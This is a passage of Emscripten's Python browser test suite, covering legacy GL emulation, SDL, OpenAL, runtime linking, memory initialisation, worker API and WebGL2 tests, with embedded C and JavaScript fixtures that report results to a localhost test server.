def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-sUSE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-sUSE_PTHREADS', '-sUSE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(Path('third_party/cubegeom', 'cubegeom_proc.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_glew.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-sLEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_color.c'), reference=Path('third_party/cubegeom', 'cubegeom_color.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_normal.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
  def test_cubegeom_normal_dap_far(self): # indices do not start from 0
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_mt.c'), reference=Path('third_party/cubegeom', 'cubegeom_mt.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_color2.c'), reference=Path('third_party/cubegeom', 'cubegeom_color2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_texturematrix.c'), reference=Path('third_party/cubegeom', 'cubegeom_texturematrix.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_fog.c'), reference=Path('third_party/cubegeom', 'cubegeom_fog.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sUSE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2_vao2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2_vao2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre_vao_es.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre_vao.png'), args=['-sFULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_u4fv_2.c'), reference=Path('third_party/cubegeom', 'cubegeom_u4fv_2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-sINITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-sINITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-sLEGACY_GL_EMULATION', '-sGL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(test_file('water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-sLEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-sSTRICT'],
['--closure=1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_file('header.h', r'''
struct point {
int x, y;
};
''')
create_file('supp.c', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point *p) {
printf("supp: %d,%d\n", p->x, p->y);
mainFunc(p->x + p->y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_file('main.c', r'''
#include <stdio.h>
#include <assert.h>
#include "header.h"
extern void suppFunc(struct point *p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
assert(x == 56);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(&p);
printf("main see: %d\nok.\n", suppInt);
assert(suppInt == 76);
return 0;
}
''')
self.run_process([EMCC, 'supp.c', '-o', 'supp.wasm', '-sSIDE_MODULE', '-O2'])
self.btest_exit('main.c', args=['-sMAIN_MODULE=2', '-O2', 'supp.wasm'])
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
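    # Run with and without a memory init file; in both cases the added run dependency must delay run() until the timeout fires.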
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
self.set_setting('WASM_ASYNC_COMPILATION', 0)
create_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_file('post.js', '''
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
args = ['-sWASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1']
# with assertions, we notice when memory was written to too early
expected = 'abort:Assertion failed: native function `note` called before runtime initialization'
self.btest('mem_init.cpp', expected=expected, args=args)
# otherwise, we just overwrite
self.btest_exit('mem_init.cpp', args=args + ['-sASSERTIONS=0'])
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
maybeReportResultToServer('got_error');
}
console.log('WARNING: ' + x);
};
''')
self.btest('mem_init_request.cpp', expected=status, args=['-sWASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
self.set_setting('EXIT_RUNTIME')
test('test.html.mem', 'exit:0')
test('nothing.nowhere', 'got_error')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
        ok = true; // should fail and not reach here, runtime is not ready yet so any code execution will abort
      } catch(e) {
        out('expected fail 3: ' + e.toString());
assert(e.toString().indexOf('Assertion failed') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
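    # post_hook defines myJSCallback(), which main() invokes at a valid time: it makes the three calls and then reports the value stored at Module.noted back to the test server.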
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-sWASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-sEXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-sEXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(Path('browser/cwrap_early.cpp'), args=['-O2', '-sASSERTIONS', '--pre-js', test_file('browser/cwrap_early.js'), '-sEXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')
def test_worker_api(self):
self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-O2', '--minify=0', '-sEXPORTED_FUNCTIONS=_one,_two,_three,_four', '--closure=1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one', '-sASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_with_pthread_compilation_fails(self):
self.run_process([EMCC, '-c', '-o', 'hello.o', test_file('hello_world.c')])
stderr = self.expect_fail([EMCC, 'hello.o', '-o', 'a.js', '-g', '--closure=1', '-sUSE_PTHREADS', '-sBUILD_AS_WORKER=1'])
self.assertContained("USE_PTHREADS + BUILD_AS_WORKER require separate modes that don't work together, see https://github.com/emscripten-core/emscripten/issues/8854", stderr)
def test_emscripten_async_wget2(self):
self.btest_exit('test_emscripten_async_wget2.cpp')
@disabled('https://github.com/emscripten-core/emscripten/issues/15818')
def test_emscripten_async_wget2_data(self):
create_file('hello.txt', 'Hello Emscripten!')
self.btest('test_emscripten_async_wget2_data.cpp', expected='0')
def test_emscripten_async_wget_side_module(self):
self.run_process([EMCC, test_file('browser_module.c'), '-o', 'lib.wasm', '-O2', '-sSIDE_MODULE'])
self.btest_exit('browser_main.c', args=['-O2', '-sMAIN_MODULE=2'])
@parameterized({
'non-lz4': ([],),
'lz4': (['-sLZ4'],)
})
def test_preload_module(self, args):
create_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.run_process([EMCC, 'library.c', '-sSIDE_MODULE', '-O2', '-o', 'library.so'])
create_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return preloadedWasm['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-sMAIN_MODULE=2', '--preload-file', '.@/', '-O2', '--use-preload-plugins'] + args)
  # This does not actually verify anything except that --cpuprofiler and --memoryprofiler compile.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest_exit('hello_world_gles.c', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
    # First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
    # require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid/test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = read_file('test.js')
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(test_file('uuid/test.js'))
try_delete(test_file('uuid/test.js.map'))
# Now run test in browser
self.btest_exit(test_file('uuid/test.c'), args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-sLEGACY_GL_EMULATION'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-sLEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure=1', '-sHTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],),
'legacy': (['-sMIN_FIREFOX_VERSION=0', '-sMIN_SAFARI_VERSION=0', '-sMIN_IE_VERSION=0', '-sMIN_EDGE_VERSION=0', '-sMIN_CHROME_VERSION=0', '-Wno-transpile'],)
})
@requires_threads
def test_html5_core(self, opts):
if '-sHTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0' in opts:
# In this mode an exception can be thrown by the browser, and we don't
# want the test to fail in that case so we override the error handling.
create_file('pre.js', '''
window.disableErrorReporting = true;
window.addEventListener('error', (event) => {
if (!event.message.includes('exception:fullscreen error')) {
report_error(event);
}
});
''')
self.emcc_args.append('--pre-js=pre.js')
self.btest(test_file('test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
print(opts)
self.btest_exit(test_file('test_gamepad.c'), args=[] + opts)
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sFULL_ES2=1'], ['-sUSE_PTHREADS']]:
print(opts)
self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-lGL'])
@requires_graphics_hardware
  # Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context on Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest_exit(test_file('webgl_create_context2.cpp'))
@requires_graphics_hardware
  # Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context on Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -sDISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(test_file('browser/html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL'])
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest_exit(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL'])
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
@requires_graphics_hardware
def test_webgl_shader_source_length(self):
for opts in [[], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL'])
# Tests calling glGetString(GL_UNMASKED_VENDOR_WEBGL).
@requires_graphics_hardware
def test_webgl_unmasked_vendor_webgl(self):
self.btest_exit(test_file('webgl_unmasked_vendor_webgl.c'), args=['-lGL'])
@requires_graphics_hardware
def test_webgl2(self):
for opts in [
['-sMIN_CHROME_VERSION=0', '-Wno-transpile'],
['-O2', '-g1', '--closure=1', '-sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-sFULL_ES2=1'],
]:
print(opts)
self.btest_exit(test_file('webgl2.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'] + opts)
# Tests the WebGL 2 glGetBufferSubData() functionality.
@requires_graphics_hardware
def test_webgl2_get_buffer_sub_data(self):
self.btest_exit(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest_exit(test_file('webgl2.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL', '-sUSE_PTHREADS'])
@requires_graphics_hardware
def test_webgl2_objects(self):
self.btest_exit(test_file('webgl2_objects.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
def test_html5_webgl_api(self):
for mode in [['-sOFFSCREENCANVAS_SUPPORT', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],
['-sOFFSCREEN_FRAMEBUFFER', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest_exit(test_file('html5_webgl.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'] + mode)
@requires_graphics_hardware
def test_webgl2_ubos(self):
self.btest_exit(test_file('webgl2_ubos.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'])
self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'))
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest_exit(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-sWEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'])
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
    # tests that if we support WebGL 1 and 2, and WebGL2RenderingContext exists
    # but context creation fails, we can then manually create a WebGL 1 context
    # and succeed.
self.btest_exit(test_file('test_webgl2_runtime_no_context.cpp'), args=['-sMAX_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest_exit(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-sMAX_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest_exit(test_file('webgl_with_closure.cpp'), args=['-O2', '-sMAX_WEBGL_VERSION=2', '--closure=1', '-lGL'])
  # Tests that -sGL_ASSERTIONS and glVertexAttribPointer with packed types work
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest_exit(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-sMAX_WEBGL_VERSION=2', '-sGL_ASSERTIONS'])
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest_exit(test_file('webgl2_pbo.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(test_file('third_party/sokol/mipmap-emsc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=Path('third_party/sokol', 'mipmap-emsc.png'), reference_slack=2)
